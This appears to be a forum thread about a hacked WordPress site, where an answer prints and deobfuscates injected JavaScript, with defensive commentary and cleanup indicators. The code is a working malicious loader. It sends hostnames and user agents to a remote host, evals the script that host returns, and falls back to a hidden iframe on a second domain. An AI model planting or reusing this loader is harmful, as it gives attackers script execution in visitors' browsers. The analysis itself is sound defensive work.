I'm getting an error with the WordPress page REMOVED, it seems that the website 2zz3.gq
is being "injected" into the request but I'm not really sure when or how.
When I try to load the page on Chrome I see a "The site ahead contains malware" error:
But I see no error on Firefox or other browsers. How can I solve this issue? So far I have tried:
2zz3.gq
(apparently a server from Russia) but the error still appears on Chrome. Could someone please give me some advice on this issue?
Is the plugin disabled now?
Check the source of your site to see if it has been modified in any way.
Easiest might be to restore a backup to ensure you don't miss any malicious changes.
WARNING
This is malicious code. I've put it on here for explanation purposes, but I'd recommend that you DO NOT execute this
It's not as bad as a link that someone might accidentally click, and I figure this warning should suffice for anyone who decides that pasting this into their JS console seems like a good idea...
I see the following packed code block when I curl your site.
// Wrapped in the common p,a,c,k,e,d packer (Dean Edwards' /packer/): the first string argument is
// the real program with every identifier and keyword replaced by a numeric token, and the trailing
// '|'-separated list maps those tokens back. The leading eval() is what actually runs the unpacked
// program on page load; the readable form is the listing below this block.
// Detection note: the literal prefix  eval(function(p,a,c,k,e,d)  is a cheap indicator to search
// for in theme/plugin files and stored post/option content when hunting for further copies.
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('26 25(7,13){15 9=7.80(13);10(9>78)49"76: 83 100 5";19 9}26 35(7){10(1!==85.22)49"93: 92 88 86 87";7=99(7);15 13,9,17=[],31=7.22-7.22%3;10(0===7.22)19 7;97(13=0;31>13;13+=3)9=25(7,13)<<16|25(7,13+1)<<8|25(7,13+2),17.28(20.21(9>>18)),17.28(20.21(9>>12&63)),17.28(20.21(9>>6&63)),17.28(20.21(63&9));96(7.22-31){74 1:9=25(7,13)<<16,17.28(20.21(9>>18)+20.21(9>>12&63)+33+33);77;74 2:9=25(7,13)<<16|25(7,13+1)<<8,17.28(20.21(9>>18)+20.21(9>>12&63)+20.21(9>>6&63)+33)}19 17.55("")}15 33="=",20="79+/",81="1.0";26 51(){15 11;37{11=39 68("82.70")}44(17){37{11=39 68("94.70")}44(95){11=90}}10(!11&&91 66!=\'89\'){11=39 66()}19 11}26 72(14){23=14.30(\'\\<54\');10(23==-1)19\'\';23=14.30(\'>\',23);10(23==-1)19\'\';23++;24=14.30(\'\\<\\/54\\>\',23);10(24==-1)19\'\';19 14.58(23,24)}26 64(14){10(14.30(\'%48%\')==-1)19 14;19 14.98(\'%48%\').55(36(35(62.65.75)))}26 60(56){15 27=" "+34.27;15 40=" "+56+"=";15 38=42;15 29=0;15 24=0;10(27.22>0){29=27.30(40);10(29!=-1){29+=40.22;24=27.30(";",29);10(24==-1){24=27.22}38=84(27.58(29,24))}}19(38)}34.107(\'<57 132="43"></57>\');10(60(\'133\')==42){15 32=\'50\'+\'7\'+\'45:\'+\'/\'+\'/\'+\'2\'+\'61\'+\'61\'+\'3\'+\'.\'+\'47\'+\'134\'+\'/\'+\'131\'+\'73\'+\'7.45\'+\'67\';32+=(\'?7=3&126=\'+36(35(62.65.125)));32+=(\'&101=\'+36(35(127.128)));37{15 11=51();11.129(\'136\',32,137);11.145=26(){10(11.146==4&&11.142==138){14=64(11.139);34.71("43").69=14;41=72(14);10(41.22>0)140(41)}};11.141(42)}44(17){34.71("43").69=\'<\'+\'59\'+\'46\'+\'144 124\'+\'108\'+\'="52\'+\'109\'+\':/\'+\'/\'+\'110\'+\'2\'+\'-\'+\'53\'+\'102\'+\'53\'+\'.\'+\'47\'+\'73\'+\'/\'+\'103\'+\'104\'+\'112\'+\'.45\'+\'67"\'+\' 113\'+\'121=\'+\'"0\'+\'" 122\'+\'119\'+\'7="0\'+\'" 46\'+\'118\'+\'114\'+\'31="\'+\'0" 115\'+\'116\'+\'117\'+\'52="\'+\'0" 
123\'+\'120\'+\'105\'+\'50="\'+\'0" 106\'+\'111\'+\'143\'+\'47="\'+\'130\'+\'">\'+\'<\'+\'/\'+\'59\'+\'46\'+\'135\'+\'17\'+\'>\'}}',10,147,'|||||||t||_|if|xmlhttp||A|src|var||e||return|_ALPHA|charAt|length|start|end|_pref_xxs_getbyte|function|cookie|push|offset|indexOf|r|url|_PADCHAR|document|_pref_xxs_encode64|encodeURIComponent|try|setStr|new|search|code|null|statspan_0_1|catch|p|fr|g|ENCURL|throw|ht|_pref_xxs_getXmlHttp|h|b|script|join|name|span|substring|i|_pref_xxs_getCookie|z|window||_pref_xxs_processMacro|location|XMLHttpRequest|hp|ActiveXObject|innerHTML|XMLHTTP|getElementById|_pref_xxs_extractScript|a|case|href|INVALID_CHARACTER_ERR|break|255|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|charCodeAt|_VERSION|Msxml2|DOM|unescape|arguments|argument|required|one|undefined|false|typeof|exactly|SyntaxError|Microsoft|E|switch|for|split|String|Exception|ua|o|co|un|nheig|sc|write|rc|ttp|l|rol|ter|wid|rde|mar|ginw|idt|amebo|gh|rgi|th|hei|ma|s|hostname|d|navigator|userAgent|open|no|st|id|stat01|q|am|GET|true|200|responseText|eval|send|status|lin|ame|onreadystatechange|readyState'.split('|'),0,{}))
which translates to
// Byte reader for the Base64 encoder below: returns the UTF-16 code unit of t at index A and
// rejects anything above 0xFF. Note it throws a plain string rather than an Error object, so
// the failure carries no stack trace.
function _pref_xxs_getbyte(t,A)
{
var _=t.charCodeAt(A);
if(_>255)throw"INVALID_CHARACTER_ERR: DOM Exception 5";
return _
}
// Hand-rolled standard Base64 encoder (the usual A-Z a-z 0-9 + / alphabet, '=' padding) over the
// code units of t; because _pref_xxs_getbyte rejects code units above 0xFF, non-Latin-1 input
// throws. In this sample it is used only to encode what the script sends to the remote server
// (page hostname, user agent, page URL). That is transport encoding, not encryption: anyone with
// the captured request or the server's logs can read the values back directly.
function _pref_xxs_encode64(t)
{
if(1!==arguments.length)throw"SyntaxError: exactly one argument required";
t=String(t);
var A,_,e=[],r=t.length-t.length%3;
if(0===t.length)return t;
for(A=0;
r>A;
A+=3)_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8|_pref_xxs_getbyte(t,A+2),e.push(_ALPHA.charAt(_>>18)),e.push(_ALPHA.charAt(_>>12&63)),e.push(_ALPHA.charAt(_>>6&63)),e.push(_ALPHA.charAt(63&_));
// Tail handling for the 1 or 2 bytes left over after the 3-byte groups, padded with _PADCHAR.
switch(t.length-r)
{
case 1:_=_pref_xxs_getbyte(t,A)<<16,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_PADCHAR+_PADCHAR);
break;
case 2:_=_pref_xxs_getbyte(t,A)<<16|_pref_xxs_getbyte(t,A+1)<<8,e.push(_ALPHA.charAt(_>>18)+_ALPHA.charAt(_>>12&63)+_ALPHA.charAt(_>>6&63)+_PADCHAR)
}
return e.join("")
}
// Base64 pad character and alphabet used by _pref_xxs_encode64. _VERSION is declared but never
// read anywhere in this listing.
var _PADCHAR="=",_ALPHA="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",_VERSION="1.0";
// Legacy XHR factory: tries the two ActiveX ProgIDs used by old Internet Explorer first, then the
// standard XMLHttpRequest. Returns false when none of the three is available; the loader at the
// bottom of the listing does not check for that and relies on its own try/catch instead.
function _pref_xxs_getXmlHttp()
{
var xmlhttp;
try
{
xmlhttp=new ActiveXObject("Msxml2.XMLHTTP")
}
catch(e)
{
try
{
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP")
}
catch(E)
{
xmlhttp=false
}
}
if(!xmlhttp&&typeof XMLHttpRequest!='undefined')
{
xmlhttp=new XMLHttpRequest()
}
return xmlhttp
}
// Returns the text between the first '<script ...>' tag and the following '</script>' in src, or
// '' if either is missing. It is applied to the remote server's response body, and whatever it
// returns is handed straight to eval by the loader at the bottom of the listing.
// 'start' and 'end' are assigned without var, so they leak as globals.
// The '\<' and '\/' escapes are no-ops inside a JS string literal ('\<script' === '<script');
// presumably they are there to defeat a naive text search for the literal tag -- inferred, not
// something this listing can confirm.
function _pref_xxs_extractScript(src)
{
start=src.indexOf('\<script');
if(start==-1)return'';
start=src.indexOf('>',start);
if(start==-1)return'';
start++;
end=src.indexOf('\<\/script\>',start);
if(end==-1)return'';
return src.substring(start,end)
}
// Template substitution on the fetched payload: every '%ENCURL%' in src is replaced by
// encodeURIComponent(Base64(window.location.href)), i.e. the remote server can embed the full
// URL of the infected page into the HTML/script it sends back. src is returned unchanged when
// the marker is absent.
function _pref_xxs_processMacro(src)
{
if(src.indexOf('%ENCURL%')==-1)return src;
return src.split('%ENCURL%').join(encodeURIComponent(_pref_xxs_encode64(window.location.href)))
}
// Looks up a cookie by name in document.cookie and returns its unescape()d value, or null when it
// is absent. The loader below uses it as a gate: when the 'stat01' cookie is present, the beacon
// is skipped entirely.
// NOTE: the '";' / '",offset)' split across two lines in this listing is a formatting artifact of
// the page; the packed source above passes the one-character string ";" to indexOf.
function _pref_xxs_getCookie(name)
{
var cookie=" "+document.cookie;
var search=" "+name+"=";
var setStr=null;
var offset=0;
var end=0;
if(cookie.length>0)
{
offset=cookie.indexOf(search);
if(offset!=-1)
{
offset+=search.length;
end=cookie.indexOf(";
",offset);
if(end==-1)
{
end=cookie.length
}
setStr=unescape(cookie.substring(offset,end))
}
}
return(setStr)
}
// --- Loader / beacon: top-level code, runs as soon as the injected script is parsed ---
// Injection point and indicator: a span with this id is written into every page carrying the script.
document.write('<span id="statspan_0_1"></span>');
// Gate: nothing below runs if the 'stat01' cookie is already set. Nothing in this listing sets it,
// so it is presumably set by the fetched response (unverified). Consequence for responders: a
// browser that already carries the cookie will NOT show the request, so test from a fresh profile
// or with curl, as this answer did.
if(_pref_xxs_getCookie('stat01')==null)
{
// Target assembled from one- and two-character fragments so the domain never appears as a
// contiguous string in the file; resolves to the 2***.gq stat.php endpoint over plain http.
var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
// Data sent along: t=3 (fixed), d=Base64(page hostname), ua=Base64(browser user agent).
url+=('?t=3&d='+encodeURIComponent(_pref_xxs_encode64(window.location.hostname)));
url+=('&ua='+encodeURIComponent(_pref_xxs_encode64(navigator.userAgent)));
try
{
// _pref_xxs_getXmlHttp() may return false; open() would then throw and land in the catch below.
var xmlhttp=_pref_xxs_getXmlHttp();
xmlhttp.open('GET',url,true);
xmlhttp.onreadystatechange=function()
{
// Only a 200 response does anything; any other status is silently ignored, and the catch below
// does not cover this asynchronous path.
if(xmlhttp.readyState==4&&xmlhttp.status==200)
{
// The response body (with %ENCURL% expanded) goes into the DOM via innerHTML, then the first
// <script> block inside it is eval'd: the remote server gets arbitrary script execution in the
// site's origin for every visitor without the cookie. 'src' and 'code' are implicit globals.
src=_pref_xxs_processMacro(xmlhttp.responseText);
document.getElementById("statspan_0_1").innerHTML=src;
code=_pref_xxs_extractScript(src);
if(code.length>0)eval(code)
}
};
xmlhttp.send(null)
}
catch(e)
{
// Synchronous-failure fallback (no XHR object, or open/send threw): write a 0x0, borderless,
// non-scrolling iframe pointing at l2***.ga/counter.php, built from fragments the same way.
document.getElementById("statspan_0_1").innerHTML='<'+'i'+'fr'+'ame s'+'rc'+'="h'+'ttp'+':/'+'/'+'l'+'2'+'-'+'b'+'o'+'b'+'.'+'g'+'a'+'/'+'co'+'un'+'ter'+'.p'+'hp"'+' wid'+'th='+'"0'+'" hei'+'gh'+'t="0'+'" fr'+'amebo'+'rde'+'r="'+'0" mar'+'ginw'+'idt'+'h="'+'0" ma'+'rgi'+'nheig'+'ht="'+'0" sc'+'rol'+'lin'+'g="'+'no'+'">'+'<'+'/'+'i'+'fr'+'am'+'e'+'>'
}
}
// Cleanup indicators grounded in this sample: the '_pref_xxs_' identifier prefix, the
// 'statspan_0_1' span id, the 'stat01' cookie name, and the 'eval(function(p,a,c,k,e,d' packer
// header. Search theme/plugin files and stored post/option content for them; restoring a
// known-clean backup, as suggested earlier on this page, is the surest way not to miss a copy.
Note the line
var url='ht'+'t'+'p:'+'/'+'/'+'2'+'z'+'z'+'3'+'.'+'g'+'q'+'/'+'st'+'a'+'t.p'+'hp';
which actually constructs the 2***.gq URL. 1
If you don't have a stat01 cookie set, it loads stat.php from there (presumably malicious JS source) and executes it using eval.
In the process of making the request, it also sends up some user data (for metrics, loading proper exploit code, or something else?), including the current hostname and the useragent of the user's browser.
Note that, should this fail, it also falls back on loading a URL at another domain, l2***.ga/counter.php 1, in an iframe.
1 link purposely broken, see source if you're interested